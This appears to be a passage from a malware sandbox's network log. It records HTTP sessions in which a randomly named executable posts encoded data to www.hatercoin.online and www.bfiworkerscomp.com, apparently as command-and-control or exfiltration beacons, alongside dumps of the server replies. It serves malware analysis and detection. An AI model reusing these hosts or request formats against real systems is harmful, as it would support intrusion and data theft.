                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.549717142.250.181.243806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:15:51.064470053 CEST787OUTPOST /wf3a/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.hatercoin.online
                      Origin: http://www.hatercoin.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.hatercoin.online/wf3a/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 4a 49 39 6a 55 33 5a 59 7a 6a 55 4e 57 72 35 41 61 65 6f 74 62 67 6b 6d 62 65 45 43 4c 77 55 42 4a 61 45 79 46 4d 63 50 2b 52 69 37 6e 43 2f 2f 72 6b 47 5a 68 34 36 73 46 4c 56 48 6c 42 52 68 34 69 4a 63 72 51 68 75 50 59 50 4c 32 42 79 54 45 69 52 7a 59 34 62 72 55 39 2f 34 6c 6e 59 4a 68 51 53 2b 46 44 45 54 49 66 52 63 53 57 7a 6a 68 65 69 65 4b 71 51 6b 74 45 54 66 44 4d 4e 4e 72 44 43 7a 4f 6f 61 63 4e 56 61 67 53 44 48 70 53 32 4e 67 64 70 47 72 75 6c 68 75 31 64 51 4e 4c 7a 42 71 41 75 6c 55 46 30 75 47 43 56 68 53 53 52 43 6a 55 39 78 79 73 76 76 57 70 4b 6b 61 71 73 45 33 4c 75 6f 3d
                      Data Ascii: 66s0QHx=JI9jU3ZYzjUNWr5AaeotbgkmbeECLwUBJaEyFMcP+Ri7nC//rkGZh46sFLVHlBRh4iJcrQhuPYPL2ByTEiRzY4brU9/4lnYJhQS+FDETIfRcSWzjheieKqQktETfDMNNrDCzOoacNVagSDHpS2NgdpGrulhu1dQNLzBqAulUF0uGCVhSSRCjU9xysvvWpKkaqsE3Luo=
                      Jul 2, 2024 07:15:51.796833038 CEST406INHTTP/1.1 301 Moved Permanently
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 02 Jul 2024 05:15:51 GMT
                      Location: https://www.hatercoin.online/wf3a/
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.549718142.250.181.243806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:15:53.606735945 CEST807OUTPOST /wf3a/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.hatercoin.online
                      Origin: http://www.hatercoin.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.hatercoin.online/wf3a/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 4a 49 39 6a 55 33 5a 59 7a 6a 55 4e 55 4c 4a 41 64 39 41 74 51 67 6b 6e 55 2b 45 43 51 67 55 46 4a 61 49 79 46 4e 70 43 2b 6a 47 37 6b 6e 62 2f 71 67 71 5a 69 34 36 73 64 37 55 44 72 68 52 71 34 69 4e 55 72 56 42 75 50 59 72 4c 32 41 69 54 46 56 6c 77 65 34 62 70 66 64 2f 36 72 48 59 4a 68 51 53 2b 46 43 67 70 49 66 35 63 54 6d 44 6a 68 2f 69 66 48 4b 51 6e 71 45 54 66 4a 73 4e 4a 72 44 43 42 4f 70 47 32 4e 58 53 67 53 43 33 70 63 43 52 6a 58 70 47 74 7a 31 67 6e 30 5a 4a 7a 48 53 39 71 45 34 51 44 51 31 79 72 44 6a 4d 34 49 7a 4b 4c 48 64 64 4b 38 38 6e 68 34 36 46 7a 77 50 55 48 56 35 38 58 6e 6f 65 52 51 70 43 52 77 42 71 33 39 35 6e 61 61 4b 7a 51
                      Data Ascii: 66s0QHx=JI9jU3ZYzjUNULJAd9AtQgknU+ECQgUFJaIyFNpC+jG7knb/qgqZi46sd7UDrhRq4iNUrVBuPYrL2AiTFVlwe4bpfd/6rHYJhQS+FCgpIf5cTmDjh/ifHKQnqETfJsNJrDCBOpG2NXSgSC3pcCRjXpGtz1gn0ZJzHS9qE4QDQ1yrDjM4IzKLHddK88nh46FzwPUHV58XnoeRQpCRwBq395naaKzQ
                      Jul 2, 2024 07:15:54.344156981 CEST406INHTTP/1.1 301 Moved Permanently
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 02 Jul 2024 05:15:54 GMT
                      Location: https://www.hatercoin.online/wf3a/
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.549719142.250.181.243806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:15:56.138314962 CEST1824OUTPOST /wf3a/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.hatercoin.online
                      Origin: http://www.hatercoin.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.hatercoin.online/wf3a/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 4a 49 39 6a 55 33 5a 59 7a 6a 55 4e 55 4c 4a 41 64 39 41 74 51 67 6b 6e 55 2b 45 43 51 67 55 46 4a 61 49 79 46 4e 70 43 2b 6a 4f 37 6b 56 54 2f 72 42 71 5a 6a 34 36 73 55 62 55 4f 72 68 52 72 34 6d 68 51 72 56 46 59 50 61 6a 4c 33 69 36 54 43 67 4a 77 4c 49 62 70 43 4e 2f 37 6c 6e 59 51 68 51 69 69 46 43 77 70 49 66 35 63 54 6b 62 6a 6e 75 69 66 42 4b 51 6b 74 45 54 70 44 4d 4e 31 72 44 4c 32 4f 70 44 44 4b 6e 79 67 54 69 6e 70 65 33 4e 6a 4b 35 47 76 79 31 67 2f 30 63 52 57 48 53 68 63 45 38 51 6c 51 79 65 72 42 58 55 6a 64 42 2b 48 44 65 4e 52 2b 66 62 68 75 66 70 76 79 38 67 30 56 70 73 53 6b 61 53 44 59 50 48 51 32 68 72 36 35 39 44 78 63 65 61 4e 4e 56 72 38 43 31 73 70 75 30 35 45 52 69 2f 43 46 41 6a 6c 39 74 4d 73 6f 36 33 66 5a 2f 64 32 55 34 4c 33 37 39 74 5a 55 57 71 50 72 59 72 70 72 54 63 59 6d 61 2b 77 57 48 69 66 39 53 35 72 42 56 2f 58 35 4a 76 6d 34 31 74 6d 52 4d 55 72 39 51 61 61 56 73 7a 67 73 48 42 53 52 37 2b 36 35 33 53 64 32 6e 36 61 73 4b 6b 50 69 5a [TRUNCATED]
                      Data Ascii: 66s0QHx=JI9jU3ZYzjUNULJAd9AtQgknU+ECQgUFJaIyFNpC+jO7kVT/rBqZj46sUbUOrhRr4mhQrVFYPajL3i6TCgJwLIbpCN/7lnYQhQiiFCwpIf5cTkbjnuifBKQktETpDMN1rDL2OpDDKnygTinpe3NjK5Gvy1g/0cRWHShcE8QlQyerBXUjdB+HDeNR+fbhufpvy8g0VpsSkaSDYPHQ2hr659DxceaNNVr8C1spu05ERi/CFAjl9tMso63fZ/d2U4L379tZUWqPrYrprTcYma+wWHif9S5rBV/X5Jvm41tmRMUr9QaaVszgsHBSR7+653Sd2n6asKkPiZvsoHrZiq3Y+cQPs79cslAYwwGnUAsrlHdXQlVeVJv+JFqAZ5lVgyFsT0Msqc1fW4b6V2Vz0PfiTXSh7AdZuvKAm883wh3nwvEoPw7FkiEJqQSJ9FnIPpvTh7KwRyvD8BPMj/eiD2KVvnFwoD1EGxfLy65Pa1u2+ySFqft+0kh34/I3NHeoF3yQNcLo0Ks1NXj0YLL2USMlmKlnVReuRDSGbYF6G6zGg3FyVeQRDTUakUtBiP2HyQhw48N2cpDpppQ2ENKZRTsdymcxInNM0UGm+X6NLulMmaWlReZYw/Zd2DJP8JuTbWu3h0QJ993XX0LF6fVQ4ZhWzHDhAlK4yFGmDWG8dbed1XbgPs2ec3q44F3/max/+Z0zoLbP6zBsuPrBnALWwKa71bgpAKdcncpRreeBduQCWobYchwvZz6pjnqzR8CJsLKdgFb+Bags9cLXqbwiNlZrthz27N6IpiZ4x6kV1mYTwa2SzY2zy9ce2KwYAkaut60uujDG3QROi2gr0hLaxzTQf7Jp5e1wzFC8eMuWWB7xgClELhKb1dJnXfLx2I0k1cXAfmJWun8XinvBHu0YhR6+MTGctgtQPI816DKR9WFDOZUjNhosLOBiXytP8y6ZPEzGDwlnYAU72WG/xgOraUccrFuKmWxZ6bERW5mnRfnGe5fn [TRUNCATED]
                      Jul 2, 2024 07:15:56.881730080 CEST406INHTTP/1.1 301 Moved Permanently
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 02 Jul 2024 05:15:56 GMT
                      Location: https://www.hatercoin.online/wf3a/
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.549720142.250.181.243806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:15:58.672972918 CEST526OUTGET /wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI9BJxmHKvH3SiDTatPSqYvMyoDFRoX1f1ApOAYKP2hecch8PPIbZZar3vE0ZmDGvAwUCcsFCeR/Dh+n2QaVtkWzZCs4EoA== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.hatercoin.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:15:59.457211018 CEST571INHTTP/1.1 301 Moved Permanently
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 02 Jul 2024 05:15:59 GMT
                      Location: https://www.hatercoin.online/wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI9BJxmHKvH3SiDTatPSqYvMyoDFRoX1f1ApOAYKP2hecch8PPIbZZar3vE0ZmDGvAwUCcsFCeR/Dh+n2QaVtkWzZCs4EoA%3D%3D
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.549721208.91.197.27806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:12.803258896 CEST793OUTPOST /xzzi/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.bfiworkerscomp.com
                      Origin: http://www.bfiworkerscomp.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.bfiworkerscomp.com/xzzi/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 6f 53 78 47 67 54 2f 4b 46 57 7a 59 39 6d 73 48 76 47 54 76 35 2b 79 35 46 78 76 6e 4f 77 62 6b 64 74 39 66 59 6b 3d
                      Data Ascii: 66s0QHx=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDoSxGgT/KFWzY9msHvGTv5+y5FxvnOwbkdt9fYk=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.549722208.91.197.27806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:15.340971947 CEST813OUTPOST /xzzi/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.bfiworkerscomp.com
                      Origin: http://www.bfiworkerscomp.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.bfiworkerscomp.com/xzzi/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 53 4b 70 57 35 59 32 2b 52 79 2b 2b 39 4e 42 50 79 52 6f 5a 53 4e 50 36 43 43 5a 45 52 4f 77 75 54 72 61 73 34 76
                      Data Ascii: 66s0QHx=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78ZSKpW5Y2+Ry++9NBPyRoZSNP6CCZEROwuTras4v


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.549723208.91.197.27806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:17.877194881 CEST1830OUTPOST /xzzi/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.bfiworkerscomp.com
                      Origin: http://www.bfiworkerscomp.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.bfiworkerscomp.com/xzzi/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 4f 71 54 63 7a 61 48 2f 53 50 70 49 71 59 75 47 78 4f 68 70 34 53 37 38 78 66 4e 63 36 4d 69 74 58 75 41 39 79 68 66 58 67 77 70 71 2f 35 62 34 5a 41 73 69 31 4c 61 68 2b 63 58 59 61 54 76 65 55 6f 4b 46 43 38 41 51 52 66 48 4a 51 69 53 57 38 4b 4c 43 71 61 4b 62 4d 4b 36 4e 51 39 79 2b 61 64 69 4b 44 57 78 63 6c 4a 43 54 57 46 6d 63 71 46 79 48 52 77 54 6b 62 38 41 53 69 35 45 57 30 49 6e 68 37 34 73 43 6b 49 74 61 45 70 47 55 6f 34 76 6b 47 58 4c 52 30 49 50 47 54 54 74 31 [TRUNCATED]
                      Data Ascii: 66s0QHx=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHOqTczaH/SPpIqYuGxOhp4S78xfNc6MitXuA9yhfXgwpq/5b4ZAsi1Lah+cXYaTveUoKFC8AQRfHJQiSW8KLCqaKbMK6NQ9y+adiKDWxclJCTWFmcqFyHRwTkb8ASi5EW0Inh74sCkItaEpGUo4vkGXLR0IPGTTt1VJzrW2fLpTqbl6QU2cdsAN1NpjsWl++svj7ffKXbX8K3XTiPGoLLKLskMO9UO/wVhYzPqvZkyYXdGcE6UIlYklorxCXI9z3bUZ6AaMaXK0c4fpQ9OjEjob1k+rFLCmm4kvmvaCZb72/zL6r25+dlUipUtSjJWSPkvCLj7tR38QqWCSypUfUe10H0nZONwQoezU0lhlHeEKAa3BWh3fHS7ui+FZ8dDhKe3pz5n5QlmeEO3SEx6P0w9BrKc/eJxrEubDKEk/bi/xTNXL2qd0wTejIXTB0hFOCuXJoED4NVBzUPdyDbrIXNNLLEd+jQ41ORLEVk4+OKGmWb1wFNG8ColbXxWSIU4XNjurRU3+O2Ku5kk0ZyI51P7tYuhyW8zGcos3d5U2+UjfDOgUj+ZrMoPPN9oxCBp2c5gYce3Xc1lySKyzniumTANAV26a0SkZ5jXbxaBVD46sBZ4M3u/ztJPWW6FLDLRre6Gc/y+L/TI/S9yn2hk+aMNHpu4WWb6Qf9LRkb++vmpa9XNv9Ol5Oi4hV3o1ioWQYBiW1IaFrGL3y192e9tE6kyL7kFqs2FK4JpI365zqCPlKixmMbHB04DYWqKSVzJqxYL1bTPNzurYRxhGfL4wEjN99XmeLZR1xF6mHGBcEf2eeEC5WVimeFn2AXKOlauyE6cn [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.549724208.91.197.27806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:20.513164043 CEST528OUTGET /xzzi/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.bfiworkerscomp.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:16:24.389334917 CEST1236INHTTP/1.1 200 OK
                      Date: Tue, 02 Jul 2024 05:16:14 GMT
                      Server: Apache
                      Set-Cookie: vsid=928vr467442974912649925; expires=Sun, 01-Jul-2029 05:16:14 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      Data Raw: 34 32 35 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 46 64 41 6c 53 77 70 49 50 6c 5a 45 43 43 36 63 4d 78 51 50 48 4a 6a 66 39 6d 6a 45 72 59 30 4f 57 79 66 30 6d 37 33 51 59 31 79 65 68 77 33 35 34 54 6c 43 59 6b 58 6e 76 4e 68 51 39 4c 77 79 68 6a 4f 50 44 74 44 7a 6d 35 50 33 4f 79 6a 4b 54 34 4b 43 32 67 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED]
                      Data Ascii: 425b<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_FdAlSwpIPlZECC6cMxQPHJjf9mjErY0OWyf0m73QY1yehw354TlCYkXnvNhQ9LwyhjOPDtDzm5P3OyjKT4KC2g==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <title>bfiworkerscomp.com</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}.asset_star1 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star1.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}.asset_starH {background: url('//d38psrni17bvxu
                      Jul 2, 2024 07:16:24.389693022 CEST1236INData Raw: 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 74 68 65 6d 65 73 2f 61 73 73 65 74 73 2f 73 74 61 72 48 2e 67 69 66 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 3b 0a 09 77 69 64 74 68 3a 20 31 33 70 78 3b 0a 09 68 65 69 67 68 74 3a
                      Data Ascii: .cloudfront.net/themes/assets/starH.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}.sitelink {padding-right: 16px;}.sellerRatings a:link,.sellerRatings a:visited,.sellerRatings a:hover,.sellerRatings a:
